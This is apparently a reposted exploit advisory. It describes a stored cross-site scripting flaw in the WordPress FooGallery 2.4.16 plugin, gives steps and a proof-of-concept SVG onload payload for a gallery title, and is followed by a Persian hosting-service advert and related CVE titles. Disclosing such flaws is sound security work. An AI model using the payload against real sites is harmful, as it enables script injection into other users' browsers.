WordPress FooGallery 2.4.16 Cross Site Scripting 

# Exploit Title: FooGallery version : 2.4.16 Stored XSS
# Date: 2024-07-02
# Exploit Author: tmrswrr
# Category : Webapps
# Vendor Homepage: https://wordpress.org/plugins/foogallery/
# Version 2.4.16
### Steps to Execute the Payload:
1. **Click Add New Gallery**: [Add New Gallery](https://127.0.0.1/wp-admin/post-new.php?post_type=foogallery)
2. **Write Add Title your payload**: `"><sVg/onLy=1 onLoaD=confirm(1)//`
3. **Click Publish**, then click **Create Gallery Page**.
4. **Verify Execution**: You will see the payload executed in the usage field.

آسیب‌پذیری‌های جدید و وصله‌های امنیتی به‌صورت مداوم منتشر می‌شوند و عدم بروزرسانی به‌موقع می‌تواند امنیت سرویس‌های حیاتی را به خطر بیندازد. خدمات مدیریت و پشتیبانی سرور آفاق هاستینگ شامل پایش امنیتی، بروزرسانی نرم‌افزارها، نصب Patchهای امنیتی و سخت‌سازی سرورها است.

خدمات مدیریت و امنیت سرور

نوشته های مشابه

CVE-2026-7273 – Zyxel GS1900-48HPv2 Stack-Based Buffer Overflow Remote Code Execution

CVE-2026-42014 – Gnutls: fix use-after-free in gnutls_pkcs11_token_set_pin

CVE-2026-1767 – Localsearch: tracker-miners: gnome localsearch mp3 extractor: heap buffer overflow leading to denial of service or information disclosure via malformed mp3 id3 tags

CVE-2026-1766 – Localsearch: tracker-miners: gnome localsearch mp3 extractor: denial of service and information disclosure via malformed mp3 files.